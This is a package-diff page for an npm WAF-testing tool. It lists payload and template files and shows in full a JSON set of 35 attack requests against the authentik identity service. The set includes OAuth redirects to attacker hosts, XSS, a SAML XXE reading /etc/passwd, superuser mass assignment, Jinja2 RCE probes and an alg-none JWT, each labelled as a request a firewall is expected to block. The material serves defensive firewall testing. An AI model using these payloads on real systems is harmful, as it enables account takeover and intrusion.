npm - @waftester/cli - Versions diffs - 2.8.0 - Mend

@waftester/cli 2.8.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (141) hide show

package/LICENSE +80 -0
package/LICENSE-COMMUNITY +28 -0
package/README.md +121 -0
package/bin/cli.js +152 -0
package/package.json +52 -0
package/payloads/community/README.md +45 -0
package/payloads/community/ai/ml-poisoning.json +173 -0
package/payloads/community/ai/prompt-injection.json +247 -0
package/payloads/community/ai/workflow-abuse.json +222 -0
package/payloads/community/auth/jwt.json +855 -0
package/payloads/community/auth/login-bypass.json +623 -0
package/payloads/community/auth/mfa.json +402 -0
package/payloads/community/auth/oauth.json +421 -0
package/payloads/community/auth/open-redirect.json +1028 -0
package/payloads/community/auth/session.json +404 -0
package/payloads/community/cache/deception.json +402 -0
package/payloads/community/cache/poisoning.json +403 -0
package/payloads/community/deserialization/gadget.json +375 -0
package/payloads/community/deserialization/prototype.json +370 -0
package/payloads/community/fuzz/content-type.json +397 -0
package/payloads/community/fuzz/headers.json +401 -0
package/payloads/community/fuzz/methods.json +397 -0
package/payloads/community/fuzz/obfuscation.json +362 -0
package/payloads/community/fuzz/special-chars.json +740 -0
package/payloads/community/fuzz/waf-bypass.json +452 -0
package/payloads/community/graphql/batching-abuse.json +271 -0
package/payloads/community/graphql/depth-limit.json +271 -0
package/payloads/community/graphql/introspection.json +267 -0
package/payloads/community/injection/crlf.json +569 -0
package/payloads/community/injection/ldap.json +357 -0
package/payloads/community/injection/nosqli.json +529 -0
package/payloads/community/injection/oscmd.json +662 -0
package/payloads/community/injection/rce-polyglots.json +452 -0
package/payloads/community/injection/sqli.json +681 -0
package/payloads/community/injection/ssti.json +584 -0
package/payloads/community/injection/upload-attacks.json +632 -0
package/payloads/community/injection/xpath.json +357 -0
package/payloads/community/injection/xxe.json +716 -0
package/payloads/community/logic/forced-browsing.json +405 -0
package/payloads/community/logic/idor.json +1026 -0
package/payloads/community/logic/privilege.json +337 -0
package/payloads/community/media/exif-injection.json +225 -0
package/payloads/community/media/metadata-poison.json +239 -0
package/payloads/community/protocol/http-smuggling.json +798 -0
package/payloads/community/protocol/http2-attacks.json +382 -0
package/payloads/community/protocol/websocket-abuse.json +375 -0
package/payloads/community/rate-limit/burst-simulation.json +286 -0
package/payloads/community/rate-limit/bypass-attempts.json +326 -0
package/payloads/community/rate-limit/zone-tests.json +332 -0
package/payloads/community/services/authentik.json +415 -0
package/payloads/community/services/immich.json +423 -0
package/payloads/community/services/n8n.json +366 -0
package/payloads/community/sqli-basic.json +182 -0
package/payloads/community/ssrf/cloud-metadata.json +999 -0
package/payloads/community/ssrf/dns-rebinding.json +503 -0
package/payloads/community/ssrf/internal-networks.json +627 -0
package/payloads/community/ssrf/protocol-smuggling.json +350 -0
package/payloads/community/ssti/multi-language-templates.json +191 -0
package/payloads/community/ssti/python-templates.json +200 -0
package/payloads/community/traversal/basic.json +675 -0
package/payloads/community/traversal/cloud-credentials.json +107 -0
package/payloads/community/traversal/config-files.json +193 -0
package/payloads/community/traversal/encoding.json +558 -0
package/payloads/community/traversal/null-byte.json +105 -0
package/payloads/community/traversal/symlink.json +93 -0
package/payloads/community/traversal/unicode.json +134 -0
package/payloads/community/traversal/unix-advanced.json +195 -0
package/payloads/community/traversal/windows-advanced.json +195 -0
package/payloads/community/waf-bypass/cloudflare-bypass.json +102 -0
package/payloads/community/waf-bypass/encoding-bypass.json +120 -0
package/payloads/community/waf-bypass/evasion-techniques.json +164 -0
package/payloads/community/waf-bypass/hpp-bypass.json +92 -0
package/payloads/community/waf-bypass/modsecurity-crs.json +220 -0
package/payloads/community/waf-bypass/protocol-attacks.json +101 -0
package/payloads/community/waf-bypass/sqlmap-tamper.json +252 -0
package/payloads/community/waf-bypass/unicode-charset.json +152 -0
package/payloads/community/waf-bypass/vendor-bypasses.json +72 -0
package/payloads/community/waf-validation/README.md +172 -0
package/payloads/community/waf-validation/bypass-techniques.json +272 -0
package/payloads/community/waf-validation/custom-rules.json +952 -0
package/payloads/community/waf-validation/evasion-techniques.json +272 -0
package/payloads/community/waf-validation/modsecurity-core.json +151 -0
package/payloads/community/waf-validation/owasp-top10.json +236 -0
package/payloads/community/waf-validation/regression-tests.json +227 -0
package/payloads/community/xss/csp-bypass.json +431 -0
package/payloads/community/xss/dom.json +389 -0
package/payloads/community/xss/filter-bypass.json +1242 -0
package/payloads/community/xss/mutation.json +263 -0
package/payloads/community/xss/polyglots.json +371 -0
package/payloads/community/xss/reflected.json +187 -0
package/payloads/community/xss/stored.json +330 -0
package/payloads/crlf-injection.json +182 -0
package/payloads/ids-map.json +155 -0
package/payloads/ldap-injection.json +182 -0
package/payloads/nosql-injection.json +227 -0
package/payloads/prototype-pollution.json +182 -0
package/payloads/request-smuggling.json +182 -0
package/payloads/version.json +28 -0
package/payloads/xss-advanced.json +227 -0
package/templates/README.md +221 -0
package/templates/nuclei/http/waf-bypass/crlf-bypass.yaml +146 -0
package/templates/nuclei/http/waf-bypass/lfi-bypass.yaml +152 -0
package/templates/nuclei/http/waf-bypass/nosqli-bypass.yaml +166 -0
package/templates/nuclei/http/waf-bypass/rce-bypass.yaml +171 -0
package/templates/nuclei/http/waf-bypass/sqli-basic.yaml +142 -0
package/templates/nuclei/http/waf-bypass/sqli-evasion.yaml +192 -0
package/templates/nuclei/http/waf-bypass/ssrf-bypass.yaml +130 -0
package/templates/nuclei/http/waf-bypass/ssti-bypass.yaml +147 -0
package/templates/nuclei/http/waf-bypass/xss-basic.yaml +163 -0
package/templates/nuclei/http/waf-bypass/xss-evasion.yaml +217 -0
package/templates/nuclei/http/waf-bypass/xxe-bypass.yaml +204 -0
package/templates/nuclei/http/waf-detection/akamai-detect.yaml +105 -0
package/templates/nuclei/http/waf-detection/aws-waf-detect.yaml +115 -0
package/templates/nuclei/http/waf-detection/azure-waf-detect.yaml +114 -0
package/templates/nuclei/http/waf-detection/cloudflare-detect.yaml +121 -0
package/templates/nuclei/http/waf-detection/modsecurity-detect.yaml +129 -0
package/templates/nuclei/workflows/waf-assessment-workflow.yaml +71 -0
package/templates/output/asff.tmpl +61 -0
package/templates/output/csv.tmpl +4 -0
package/templates/output/junit.tmpl +34 -0
package/templates/output/markdown-report.tmpl +92 -0
package/templates/output/slack-notification.tmpl +95 -0
package/templates/output/text-summary.tmpl +56 -0
package/templates/overrides/api-only.yaml +130 -0
package/templates/overrides/crs-tuning.yaml +204 -0
package/templates/overrides/false-positive-suppression.yaml +159 -0
package/templates/policies/owasp-top10.yaml +152 -0
package/templates/policies/pci-dss.yaml +124 -0
package/templates/policies/permissive.yaml +40 -0
package/templates/policies/standard.yaml +57 -0
package/templates/policies/strict.yaml +72 -0
package/templates/report-configs/compliance.yaml +173 -0
package/templates/report-configs/dark.yaml +136 -0
package/templates/report-configs/enterprise.yaml +175 -0
package/templates/report-configs/minimal.yaml +84 -0
package/templates/report-configs/print.yaml +139 -0
package/templates/workflows/api-scan.yaml +132 -0
package/templates/workflows/ci-gate.yaml +129 -0
package/templates/workflows/full-scan.yaml +133 -0
package/templates/workflows/quick-probe.yaml +80 -0
package/templates/workflows/waf-detection.yaml +89 -0

package/payloads/community/services/authentik.json ADDED Viewed

@@ -0,0 +1,415 @@
+[
+  {
+    "id": "SVC-AUTK-001",
+    "payload": "/application/o/authorize/?client_id=test&redirect_uri=https://evil.com/callback&response_type=code",
+    "tags": ["oauth", "open-redirect", "quick", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OAuth open redirect to malicious callback URL",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/application/o/authorize/"
+  },
+  {
+    "id": "SVC-AUTK-002",
+    "payload": "/application/o/authorize/?client_id=test&redirect_uri=javascript:alert(document.cookie)&response_type=code",
+    "tags": ["oauth", "xss", "quick", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OAuth redirect with javascript: scheme (XSS)",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/application/o/authorize/"
+  },
+  {
+    "id": "SVC-AUTK-003",
+    "payload": "/application/o/authorize/?client_id=test&redirect_uri=data:text/html,<script>alert(1)</script>&response_type=code",
+    "tags": ["oauth", "xss", "data-uri", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "OAuth redirect with data: URI (XSS)",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/application/o/authorize/"
+  },
+  {
+    "id": "SVC-AUTK-004",
+    "payload": "/application/o/authorize/?client_id=test&redirect_uri=http://localhost:8080@attacker.com&response_type=code",
+    "tags": ["oauth", "open-redirect", "url-parsing", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "OAuth redirect with URL parsing confusion (@)",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/application/o/authorize/"
+  },
+  {
+    "id": "SVC-AUTK-005",
+    "payload": "/application/o/authorize/?client_id=test&redirect_uri=https://auth.example.com.evil.com&response_type=code",
+    "tags": ["oauth", "open-redirect", "subdomain-takeover", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "OAuth redirect to lookalike domain (subdomain prefix)",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/application/o/authorize/"
+  },
+  {
+    "id": "SVC-AUTK-006",
+    "payload": "/source/saml/<slug>/acs/",
+    "method": "POST",
+    "body": "SAMLResponse=PD94bWwgdmVyc2lvbj0iMS4wIj8+PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgeHhlIFNZU1RFTSAiZmlsZTovLy9ldGMvcGFzc3dkIj5dPjxzYW1scDpSZXNwb25zZT4meHhlOzwvc2FtbHA6UmVzcG9uc2U+",
+    "tags": ["saml", "xxe", "quick", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SAML XXE attack attempting to read /etc/passwd",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/source/saml/<slug>/acs/"
+  },
+  {
+    "id": "SVC-AUTK-007",
+    "payload": "/source/saml/<slug>/acs/",
+    "method": "POST",
+    "body": "SAMLResponse=PHNhbWxwOlJlc3BvbnNlPjxzYW1sOkFzc2VydGlvbj48c2FtbDpBdHRyaWJ1dGVTdGF0ZW1lbnQ+PHNhbWw6QXR0cmlidXRlIE5hbWU9InJvbGUiPjxzYW1sOkF0dHJpYnV0ZVZhbHVlPmFkbWluPC9zYW1sOkF0dHJpYnV0ZVZhbHVlPjwvc2FtbDpBdHRyaWJ1dGU+PC9zYW1sOkF0dHJpYnV0ZVN0YXRlbWVudD48L3NhbWw6QXNzZXJ0aW9uPjwvc2FtbHA6UmVzcG9uc2U+",
+    "tags": ["saml", "injection", "privilege-escalation", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "SAML attribute injection - injecting admin role",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/source/saml/<slug>/acs/"
+  },
+  {
+    "id": "SVC-AUTK-008",
+    "payload": "/api/v3/core/users/",
+    "method": "POST",
+    "body": "{\"username\":\"attacker\",\"email\":\"test@test.com\",\"is_superuser\":true,\"is_staff\":true}",
+    "tags": ["api", "mass-assignment", "privilege-escalation", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "User provisioning mass assignment - creating superuser",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/api/v3/core/users/"
+  },
+  {
+    "id": "SVC-AUTK-009",
+    "payload": "/api/v3/core/users/",
+    "method": "POST",
+    "body": "{\"username\":\"attacker2\",\"email\":\"test@test.com\",\"groups\":[\"administrators\",\"superusers\"]}",
+    "tags": ["api", "mass-assignment", "group-escalation", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "User provisioning with privileged group assignment",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/api/v3/core/users/"
+  },
+  {
+    "id": "SVC-AUTK-010",
+    "payload": "/api/v3/core/users/",
+    "method": "POST",
+    "body": "{\"username\":\"attacker3\",\"email\":\"test@test.com\",\"permissions\":[\"*\"]}",
+    "tags": ["api", "mass-assignment", "wildcard-permission", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "User provisioning with wildcard permissions",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/api/v3/core/users/"
+  },
+  {
+    "id": "SVC-AUTK-011",
+    "payload": "/flows/executor/test/?query={{%20'7'*7%20}}",
+    "tags": ["ssti", "template-injection", "quick", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Flow executor template injection (Jinja2)",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/flows/executor/"
+  },
+  {
+    "id": "SVC-AUTK-012",
+    "payload": "/flows/executor/test/?query={{config.items()}}",
+    "tags": ["ssti", "info-disclosure", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Flow executor attempting to leak config via template",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/flows/executor/"
+  },
+  {
+    "id": "SVC-AUTK-013",
+    "payload": "/flows/executor/test/?query={{''.__class__.__mro__[1].__subclasses__()}}",
+    "tags": ["ssti", "rce", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Flow executor Python object traversal for RCE",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/flows/executor/"
+  },
+  {
+    "id": "SVC-AUTK-014",
+    "payload": "/flows/executor/test/?query=${7*7}",
+    "tags": ["ssti", "el-injection", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Flow executor EL expression injection",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/flows/executor/"
+  },
+  {
+    "id": "SVC-AUTK-015",
+    "payload": "/flows/executor/test/?query=<%=7*7%>",
+    "tags": ["ssti", "erb-injection", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Flow executor ERB template injection",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/flows/executor/"
+  },
+  {
+    "id": "SVC-AUTK-016",
+    "payload": "/application/o/token/",
+    "method": "POST",
+    "body": "grant_type=password&username=admin&password=admin",
+    "tags": ["oauth", "token", "brute-force", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Token endpoint password grant type (credential stuffing)",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/application/o/token/"
+  },
+  {
+    "id": "SVC-AUTK-017",
+    "payload": "/application/o/token/",
+    "method": "POST",
+    "body": "grant_type=client_credentials&client_id=test&client_secret=",
+    "tags": ["oauth", "token", "empty-secret", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Token endpoint with empty client secret",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/application/o/token/"
+  },
+  {
+    "id": "SVC-AUTK-018",
+    "payload": "/application/o/token/",
+    "method": "POST",
+    "body": "grant_type=refresh_token&refresh_token=../../../etc/passwd",
+    "tags": ["oauth", "token", "traversal", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Token endpoint with path traversal in refresh token",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/application/o/token/"
+  },
+  {
+    "id": "SVC-AUTK-019",
+    "payload": "/application/o/token/",
+    "method": "POST",
+    "body": "grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer&assertion=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJhdHRhY2tlciJ9.",
+    "tags": ["oauth", "token", "jwt-bearer", "algorithm-confusion", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "JWT bearer grant with 'none' algorithm",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/application/o/token/"
+  },
+  {
+    "id": "SVC-AUTK-020",
+    "payload": "/if/flow/recovery/?token=admin",
+    "tags": ["account-takeover", "token-prediction", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Password reset with predictable token",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/if/flow/recovery/"
+  },
+  {
+    "id": "SVC-AUTK-021",
+    "payload": "/if/flow/recovery/?token=aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa",
+    "tags": ["account-takeover", "token-enumeration", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Password reset with sequential UUID enumeration",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/if/flow/recovery/"
+  },
+  {
+    "id": "SVC-AUTK-022",
+    "payload": "/if/flow/recovery/?token[]=multi&token[]=value",
+    "tags": ["account-takeover", "array-injection", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Password reset with array parameter pollution",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/if/flow/recovery/"
+  },
+  {
+    "id": "SVC-AUTK-023",
+    "payload": "/if/flow/recovery/?token=../admin",
+    "tags": ["account-takeover", "traversal", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Password reset with path traversal in token",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/if/flow/recovery/"
+  },
+  {
+    "id": "SVC-AUTK-024",
+    "payload": "/api/v3/stages/email/verify/",
+    "method": "POST",
+    "body": "{\"email\":\"attacker@test.com\",\"token\":\"0\",\"user_id\":\"1\"}",
+    "tags": ["account-takeover", "verification-bypass", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Email verification bypass with null token and user ID injection",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/api/v3/stages/email/verify/"
+  },
+  {
+    "id": "SVC-AUTK-025",
+    "payload": "/api/v3/stages/email/verify/",
+    "method": "POST",
+    "body": "{\"email\":\"victim@test.com\",\"verified\":true}",
+    "tags": ["account-takeover", "verification-bypass", "mass-assignment", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Email verification bypass via mass assignment",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/api/v3/stages/email/verify/"
+  },
+  {
+    "id": "SVC-AUTK-026",
+    "payload": "/api/v3/stages/email/verify/",
+    "method": "POST",
+    "body": "{\"email\":\"test@test.com\",\"skip_verification\":true}",
+    "tags": ["account-takeover", "verification-bypass", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Email verification skip flag injection",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/api/v3/stages/email/verify/"
+  },
+  {
+    "id": "SVC-AUTK-027",
+    "payload": "/api/v3/core/authenticated_sessions/?session_id=attacker_session",
+    "tags": ["session-fixation", "session-hijacking", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Session fixation via custom session ID",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/api/v3/core/authenticated_sessions/"
+  },
+  {
+    "id": "SVC-AUTK-028",
+    "payload": "/application/o/authorize/?session_state=fixed_session_123",
+    "tags": ["oauth", "session-fixation", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "OAuth session fixation via session_state parameter",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/application/o/authorize/"
+  },
+  {
+    "id": "SVC-AUTK-029",
+    "payload": "/api/v3/admin/",
+    "tags": ["forced-browsing", "admin-access", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Unauthenticated admin API access attempt",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/api/v3/admin/"
+  },
+  {
+    "id": "SVC-AUTK-030",
+    "payload": "/.well-known/openid-configuration",
+    "tags": ["info-disclosure", "oidc-discovery", "low"],
+    "expected_block": false,
+    "severity_hint": "Low",
+    "notes": "OIDC discovery endpoint (should be public but monitored)",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/.well-known/openid-configuration"
+  },
+  {
+    "id": "SVC-AUTK-031",
+    "payload": "/api/v3/flows/bindings/?stage=../../admin/users",
+    "tags": ["flow", "traversal", "privilege-escalation", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Flow bindings with path traversal to admin users",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/api/v3/flows/bindings/"
+  },
+  {
+    "id": "SVC-AUTK-032",
+    "payload": "/api/v3/stages/prompt/prompts/",
+    "method": "POST",
+    "body": "{\"field_key\":\"{{constructor.constructor('return process')()}}\",\"label\":\"test\"}",
+    "tags": ["stage", "ssti", "prompt-injection", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Prompt stage with SSTI in field_key",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/api/v3/stages/prompt/prompts/"
+  },
+  {
+    "id": "SVC-AUTK-033",
+    "payload": "/application/saml/test/metadata/?download=../../admin/config.xml",
+    "tags": ["saml", "traversal", "info-disclosure", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "SAML metadata with path traversal in download parameter",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/application/saml/{slug}/metadata/"
+  },
+  {
+    "id": "SVC-AUTK-034",
+    "payload": "/api/v3/outposts/instances/?provider=*",
+    "tags": ["outpost", "enumeration", "wildcard-injection", "high"],
+    "expected_block": true,
+    "severity_hint": "High",
+    "notes": "Outpost enumeration with wildcard provider filter",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/api/v3/outposts/instances/"
+  },
+  {
+    "id": "SVC-AUTK-035",
+    "payload": "/api/v3/core/tokens/",
+    "method": "POST",
+    "body": "{\"identifier\":\"admin\",\"intent\":\"api\",\"expiring\":false}",
+    "tags": ["token", "privilege-escalation", "non-expiring", "critical"],
+    "expected_block": true,
+    "severity_hint": "Critical",
+    "notes": "Non-expiring API token creation for admin user",
+    "category": "Service-Specific",
+    "service": "authentik",
+    "endpoint": "/api/v3/core/tokens/"
+  }
+]